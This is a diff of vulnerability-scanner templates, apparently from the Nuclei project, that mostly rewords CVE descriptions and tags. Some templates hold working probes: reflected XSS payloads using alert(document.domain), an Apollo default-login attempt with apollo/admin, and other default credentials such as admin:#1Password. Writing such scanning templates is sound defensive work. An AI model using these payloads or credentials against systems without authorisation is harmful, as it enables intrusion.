        status:
          - 200
 # Enhanced by mp on 2022/03/07
--- a/cves/2021/CVE-2021-41349.yaml
+++ b/cves/2021/CVE-2021-41349.yaml
@ -1,12 +1,13 @@
 id: CVE-2021-41349
 info:
-  name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange
+  name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting
  author: rootxharsh,iamnoooob
  severity: medium
  tags: cve,cve2021,xss,microsoft,exchange
-  description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305.
+  description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
  reference:
    - https://www.microsoft.com/en-us/download/details.aspx?id=103643
    - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41349
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
@ -40,3 +41,5 @@ requests:
      - type: status
        status:
          - 500
 # Enhanced by mp on 2022/03/07
--- a/cves/2021/CVE-2021-41381.yaml
+++ b/cves/2021/CVE-2021-41381.yaml
@ -4,7 +4,7 @@ info:
  name: Payara Micro Community 5.2021.6 Directory Traversal
  author: pikpikcu
  severity: medium
-  description: Payara Micro Community 5.2021.6 and below allows Directory Traversal
+  description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
  reference:
    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41381
@ -28,3 +28,5 @@ requests:
          - "payara.security.openid.sessionScopedConfiguration=true"
        condition: and
        part: body
 # Enhanced by mp on 2022/03/07
--- a/cves/2021/CVE-2021-41467.yaml
+++ b/cves/2021/CVE-2021-41467.yaml
@ -1,13 +1,13 @@
 id: CVE-2021-41467
 info:
-  name: JustWriting  -  Reflected XSS
+  name: JustWriting  -  Reflected Cross-Site Scripting
  author: madrobot
  severity: medium
-  description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
+  description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
  reference:
    - https://github.com/hjue/JustWriting/issues/106
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41467
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
@ -36,3 +36,5 @@ requests:
        words:
          - "text/html"
        part: header
 # Enhanced by mp on 2022/03/07
--- a/cves/2021/CVE-2021-41648.yaml
+++ b/cves/2021/CVE-2021-41648.yaml
@ -1,11 +1,14 @@
 id: CVE-2021-41648
 info:
-  name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php
+  name: PuneethReddyHC action.php SQL Injection
  author: daffainfo
  severity: high
-  description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
+  description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.
-  reference: https://github.com/MobiusBinary/CVE-2021-41648
+  reference:
    - https://github.com/MobiusBinary/CVE-2021-41648
    - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41649
  tags: cve,cve2021,sqli,injection
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@ -38,3 +41,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/07
--- a/cves/2021/CVE-2021-41649.yaml
+++ b/cves/2021/CVE-2021-41649.yaml
@ -1,11 +1,14 @@
 id: CVE-2021-41649
 info:
-  name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php
+  name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection
  author: daffainfo
  severity: critical
-  description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
+  description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
-  reference: https://github.com/MobiusBinary/CVE-2021-41649
+  reference:
    - https://github.com/MobiusBinary/CVE-2021-41649
    - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41649
  tags: cve,cve2021,sqli,injection
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@ -37,3 +40,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/07
--- a/cves/2021/CVE-2021-4191.yaml
+++ b/cves/2021/CVE-2021-4191.yaml
@ -4,10 +4,11 @@ info:
  name: GitLab GraphQL API User Enumeration
  author: zsusac
  severity: medium
-  description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses.
+  description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
  reference:
    - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
    - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191
  classification:
    cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
@ -47,3 +48,5 @@ requests:
      - type: json
        json:
          - '.data.users.nodes[].username'
 # Enhanced by mp on 2022/03/07
--- a/cves/2021/CVE-2021-44521.yaml
+++ b/cves/2021/CVE-2021-44521.yaml
@ -8,6 +8,7 @@ info:
  reference:
    - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44521
    - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
  tags: cve,cve2021,network,rce,apache,cassandra
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
@ -54,3 +55,5 @@ network:
        part: raw
        words:
          - "123123"
 # Enhanced by mp on 2022/03/07
--- a/cves/2022/CVE-2022-0381.yaml
+++ b/cves/2022/CVE-2022-0381.yaml
@ -0,0 +1,37 @@
 id: CVE-2022-0381
 info:
  name: WordPress Plugin Embed Swagger 1.0.0 - Reflected XSS
  author: edoardottt
  severity: medium
  description: The Embed Swagger WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file which allows attackers to inject arbitrary web scripts onto the page, in versions up to and including 1.0.0.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0381
    cwe-id: CWE-79
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0381
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0381
  tags: cve,cve2022,swagger,xss,wordpress
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: header
        words:
          - "text/html"
      - type: word
        part: body
        words:
          - "url: \"xss://\"-alert(document.domain)"
--- a/cves/2022/CVE-2022-0692.yaml
+++ b/cves/2022/CVE-2022-0692.yaml
@ -4,7 +4,7 @@ info:
  name: Rudloff alltube prior to 3.0.1 - Open Redirect
  author: 0x_Akoko
  severity: medium
-  description: Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1
+  description: "An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1."
  reference:
    - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
    - https://www.cvedetails.com/cve/CVE-2022-0692
@ -25,3 +25,5 @@ requests:
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 # Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-21371.yaml
+++ b/cves/2022/CVE-2022-21371.yaml
@ -1,11 +1,12 @@
 id: CVE-2022-21371
 info:
-  name: Oracle WebLogic Server LFI
+  name: Oracle WebLogic Server Local File Inclusion
  author: paradessia,narluin
  severity: high
-  description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).
+  description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
  reference:
    - https://www.oracle.com/security-alerts/cpujan2022.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-21371
    - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
  classification:
@ -45,3 +46,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-22536.yaml
+++ b/cves/2022/CVE-2022-22536.yaml
@ -4,13 +4,13 @@ info:
  name: SAP Memory Pipes (MPI) Desynchronization
  author: pdteam
  severity: critical
-  description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
+  description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22536
    - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
    - https://github.com/Onapsis/onapsis_icmad_scanner
    - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
-  tags: cve,cve2022,sap,smuggling
+  tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.00
@ -57,3 +57,5 @@ requests:
          - "HTTP/1.0 500 Internal Server Error"
          - "HTTP/1.0 500 Dispatching Error"
        condition: or
 # Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-22947.yaml
+++ b/cves/2022/CVE-2022-22947.yaml
@ -4,13 +4,16 @@ info:
  name: Spring Cloud Gateway Code Injection
  author: pdteam
  severity: critical
-  description: Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
+  description: "Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host."
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22947
    - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
    - https://github.com/wdahlenburg/spring-gateway-demo
    - https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
    - https://tanzu.vmware.com/security/cve-2022-22947
  tags: cve,cve2022,apache,spring,vmware,actuator,oast
  classification:
    cve-id: CVE-2022-22947
 requests:
  - raw:
@ -75,3 +78,5 @@ requests:
        part: interactsh_protocol
        words:
          - "dns"
 # Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-23131.yaml
+++ b/cves/2022/CVE-2022-23131.yaml
@ -5,6 +5,7 @@ info:
  author: For3stCo1d
  severity: critical
  description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
  remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
  reference:
    - https://support.zabbix.com/browse/ZBX-20350
    - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
@ -39,4 +40,4 @@ requests:
        dsl:
          - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
-# Enhanced by mp on 2022/02/28
+# Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-23134.yaml
+++ b/cves/2022/CVE-2022-23134.yaml
@ -1,10 +1,10 @@
 id: CVE-2022-23134
 info:
-  name: Zabbix Setup Configuration - Unauthenticated Access
+  name: Zabbix Setup Configuration Authentication Bypass
  author: bananabr
  severity: medium
-  description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
+  description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
  reference:
    - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23134
@ -37,3 +37,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-23779.yaml
+++ b/cves/2022/CVE-2022-23779.yaml
@ -12,6 +12,11 @@ info:
  metadata:
    fofa-query: app="ZOHO-ManageEngine-Desktop"
  tags: cve,cve2022,zoho,exposure
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.30
    cve-id: CVE-2022-23779
    cwe-id: CWE-200
 requests:
  - method: GET
@ -31,13 +36,24 @@ requests:
          - 'text/html'
        condition: and
-      - type: dsl
+      - type: word
-        dsl:
+        part: location
-          - '!contains(location,host)'
+        words:
          - '{{Host}}'
        negative: true
      - type: word
        words:
          - '<center><h1>301 Moved Permanently</h1></center>'
      - type: regex
        part: location
        regex:
          - 'https?:\/\/(.*):'
    extractors:
      - type: regex
-        part: header
+        part: location
        group: 1
        regex:
          - 'https?:\/\/(.*):'
--- a/cves/2022/CVE-2022-23808.yaml
+++ b/cves/2022/CVE-2022-23808.yaml
@ -4,7 +4,7 @@ info:
  name: phpMyAdmin < 5.1.2 - Cross-Site Scripting
  author: cckuailong
  severity: medium
-  description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
+  description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
  reference:
    - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A
    - https://github.com/dipakpanchal456/CVE-2022-23808
@ -39,4 +39,4 @@ requests:
        words:
          - "\">'><script>alert(document.domain)</script>"
-# Enhanced by mp on 2022/02/28
+# Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-23944.yaml
+++ b/cves/2022/CVE-2022-23944.yaml
@ -1,12 +1,13 @@
 id: CVE-2022-23944
 info:
-  name: ShenYu Admin Unauth Access
+  name: Apache ShenYu Admin Unauth Access
  author: cckuakilong
  severity: medium
-  description: User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
+  description: "Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1."
  remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch.
  reference:
-    - https://github.com/apache/incubator-shenyu/pull/2462/files
+    - https://github.com/apache/incubator-shenyu/pull/2462
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23944
    - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
  classification:
@ -31,3 +32,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-24112.yaml
+++ b/cves/2022/CVE-2022-24112.yaml
@ -1,8 +1,9 @@
 id: CVE-2022-24112
 info:
-  name: Apache APISIX apisix/batch-requests RCE
+  name: Apache APISIX apisix/batch-requests Remote Code Execution
-  description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
+  description: "A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed."
  remediation: "Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`)."
  author: Mr-xn
  severity: critical
  reference:
@ -75,3 +76,5 @@ requests:
        group: 1
        regex:
          - 'GET \/([a-z-]+) HTTP'
 # Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-24124.yaml
+++ b/cves/2022/CVE-2022-24124.yaml
@ -1,11 +1,12 @@
 id: CVE-2022-24124
 info:
-  name: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
+  name: Casdoor 1.13.0 - Unauthenticated SQL Injection
  author: cckuailong
  severity: high
-  description: The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
+  description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.
  reference:
    - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html
    - https://www.exploit-db.com/exploits/50792
    - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24124
@ -36,3 +37,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-24260.yaml
+++ b/cves/2022/CVE-2022-24260.yaml
@ -1,7 +1,7 @@
 id: CVE-2022-24260
 info:
-  name: VoipMonitor - Pre-Auth SQL injection
+  name: VoipMonitor - Pre-Auth SQL Injection
  author: gy741
  severity: critical
  description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
@ -45,3 +45,5 @@ requests:
      - type: kval
        kval:
          - PHPSESSID
 # Enhanced by mp on 2022/03/08
--- a/cves/2022/CVE-2022-24990.yaml
+++ b/cves/2022/CVE-2022-24990.yaml
@ -0,0 +1,41 @@
 id: CVE-2022-24990
 info:
  name: TerraMaster TOS < 4.2.30 - Server Information Disclosure
  author: dwisiswant0
  severity: medium
  description: |
    TerraMaster NAS devices running TOS prior to version
    4.2.30 is vulnerable to information disclosure
  reference: https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
  metadata:
    shodan-query: TerraMaster
  tags: cve,cve2022,terramaster,exposure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/module/api.php?mobile/webNasIPS"
    headers:
      User-Agent: "TNAS"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: header
        words:
          - "application/json"
          - "TerraMaster"
        condition: and
      - type: regex
        part: body
        regex:
          - "webNasIPS successful"
          - "(ADDR|(IFC|PWD|[DS]AT)):"
          - "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick
        condition: or
--- a/cves/2022/CVE-2022-25323.yaml
+++ b/cves/2022/CVE-2022-25323.yaml
@ -1,10 +1,10 @@
 id: CVE-2022-25323
 info:
-  name: ZEROF Web Server 2.0 XSS
+  name: ZEROF Web Server 2.0 Cross-Site Scripting
  author: pikpikcu
  severity: medium
-  description: ZEROF Web Server 2.0 allows /admin.back XSS.
+  description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
  reference:
    - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25323
@ -31,3 +31,5 @@ requests:
      - type: status
        status:
          - 401
 # Enhanced by mp on 2022/03/07
--- a/default-logins/UCMDB/ucmdb-default-login.yaml
+++ b/default-logins/UCMDB/ucmdb-default-login.yaml
@ -1,9 +1,14 @@
 id: ucmdb-default-login
 info:
-  name: Micro Focus UCMDB Default Login
+  name: Micro Focus Universal CMDB Default Login
  author: dwisiswant0
  severity: high
  description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854.
  reference:
    - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm
  classification:
    cwe-id: CWE-798
  tags: ucmdb,default-login
 requests:
@ -31,3 +36,5 @@ requests:
        part: header
        words:
          - "LWSSO_COOKIE_KEY"
 # Enhanced by mp on 2022/03/07
--- a/default-logins/abb/cs141-default-login.yaml
+++ b/default-logins/abb/cs141-default-login.yaml
@ -1,13 +1,16 @@
 id: cs141-default-login
 info:
-  name: CS141 SNMP Module Default Login
+  name: UPS Adapter CS141 SNMP Module Default Login
  author: socketz
  severity: medium
  description: UPS Adapter CS141 SNMP Module default login credentials were discovered.
  reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
  tags: hiawatha,iot,default-login
  metadata:
    shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
  classification:
    cwe-id: CWE-798
 requests:
  - raw:
@ -48,3 +51,5 @@ requests:
      - type: kval
        kval:
          - accessToken
 # Enhanced by mp on 2022/03/07
--- a/default-logins/activemq/activemq-default-login.yaml
+++ b/default-logins/activemq/activemq-default-login.yaml
@ -4,6 +4,8 @@ info:
  name: Apache ActiveMQ Default Login
  author: pdteam
  severity: medium
  description: Apache ActiveMQ default login information was discovered.
  reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
  tags: apache,activemq,default-login
 requests:
@ -27,3 +29,5 @@ requests:
          - 'Welcome to the Apache ActiveMQ Console of <b>'
          - '<h2>Broker</h2>'
        condition: and
 # Enhanced by mp on 2022/03/07
--- a/default-logins/apache/tomcat-default-login.yaml
+++ b/default-logins/apache/tomcat-default-login.yaml
@ -1,8 +1,11 @@
 id: tomcat-default-login
 info:
-  name: Tomcat Manager Default Login
+  name: ApahceTomcat Manager Default Login
  author: pdteam
  description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
  severity: high
  reference:
    - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
  tags: tomcat,apache,default-login
 requests:
@ -64,3 +67,5 @@ requests:
      - type: word
        words:
          - Apache Tomcat
 # Enhanced by mp on 2022/03/03
--- a/default-logins/apollo/apollo-default-login.yaml
+++ b/default-logins/apollo/apollo-default-login.yaml
@ -0,0 +1,49 @@
 id: apollo-default-login
 info:
  name: Apollo Default Login
  author: PaperPen
  severity: high
  metadata:
    shodan-query: http.favicon.hash:11794165
  reference: https://github.com/apolloconfig/apollo
  tags: apollo,default-login
 requests:
  - raw:
      - |
        POST /signin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/signin?
        username={{user}}&password={{pass}}&login-submit=Login
      - |
        GET /user HTTP/1.1
        Host: {{Hostname}}
    attack: pitchfork
    payloads:
      user:
        - apollo
      pass:
        - admin
    cookie-reuse: true
    req-condition: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"userId":'
          - '"email":'
        condition: or
      - type: dsl
        dsl:
          - "status_code_1 == 302 && status_code_2 == 200"
          - "contains(tolower(all_headers_2), 'application/json')"
        condition: and
--- a/default-logins/azkaban/azkaban-default-login.yaml
+++ b/default-logins/azkaban/azkaban-default-login.yaml
@ -9,7 +9,7 @@ info:
    - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
  tags: default-login,azkaban
  classification:
-    cwe-id: 255
+    cwe-id: CWE-798
 requests:
  - raw:
@ -50,6 +50,4 @@ requests:
        kval:
          - azkaban.browser.session.id
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
 # Enhanced by mp on 2022/03/02
--- a/default-logins/chinaunicom/chinaunicom-default-login.yaml
+++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml
@ -7,7 +7,7 @@ info:
  description: Default login credentials were discovered for a China Unicom modem.
  tags: chinaunicom,default-login
  classification:
-    cwe-id: 798
+    cwe-id: CWE-798
 requests:
  - raw:
@ -35,4 +35,4 @@ requests:
          - "/menu.gch"
        part: header
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
--- a/default-logins/cobbler/cobbler-default-login.yaml
+++ b/default-logins/cobbler/cobbler-default-login.yaml
@ -3,7 +3,7 @@ id: cobbler-default-login
 info:
  name: Cobbler Default Login
  author: c-sh0
-  description: Cobbler default login credentials were discovered. When in /etc/cobbler/modules.conf in the [authentication] part of the "testing" module, the credential “testing:testing” is used to authenticate users.
+  description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
  reference:
    - https://seclists.org/oss-sec/2022/q1/146
    - https://github.com/cobbler/cobbler/issues/2307
@ -11,7 +11,7 @@ info:
  severity: high
  tags: cobbler,default-login,api
  classification:
-    cwe-id: cwe-798
+    cwe-id: CWE-798
 requests:
  - raw:
@ -69,4 +69,4 @@ requests:
        regex:
          - "(.*[a-zA-Z0-9].+==)</string></value>"
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
--- a/default-logins/dell/dell-idrac-default-login.yaml
+++ b/default-logins/dell/dell-idrac-default-login.yaml
@ -9,7 +9,7 @@ info:
    - https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner
  tags: dell,idrac,default-login
  classification:
-    cwe-id: 798
+    cwe-id: CWE-798
 requests:
  - raw:
@ -41,4 +41,4 @@ requests:
        words:
          - '<authResult>0</authResult>'
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
--- a/default-logins/dell/dell-idrac9-default-login.yaml
+++ b/default-logins/dell/dell-idrac9-default-login.yaml
@ -9,7 +9,7 @@ info:
    - https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
  tags: dell,idrac,default-login
  classification:
-    cwe-id: 798
+    cwe-id: cwe-798
 requests:
  - raw:
@ -39,4 +39,4 @@ requests:
        words:
          - '"authResult":0'
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
--- a/default-logins/dell/emcecom-default-login.yaml
+++ b/default-logins/dell/emcecom-default-login.yaml
@ -4,9 +4,12 @@ info:
  name: Dell EMC ECOM Default Login
  author: Techryptic (@Tech)
  severity: high
-  description: Default Login of admin:#1Password on Dell EMC ECOM application.
+  description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered.
  remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP.
  reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
  tags: dell,emc,ecom,default-login
  classification:
    cwe-id: CWE-798
 requests:
  - raw:
@ -36,3 +39,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/03
--- a/default-logins/druid/druid-default-login.yaml
+++ b/default-logins/druid/druid-default-login.yaml
@ -1,10 +1,13 @@
 id: druid-default-login
 info:
-  name: Druid Default Login
+  name: Apache Druid Default Login
  author: pikpikcu
  severity: high
  description: Apache Druid default login information (admin/admin) was discovered.
  tags: druid,default-login
  classification:
    cwe-id: CWE-798
 requests:
  - raw:
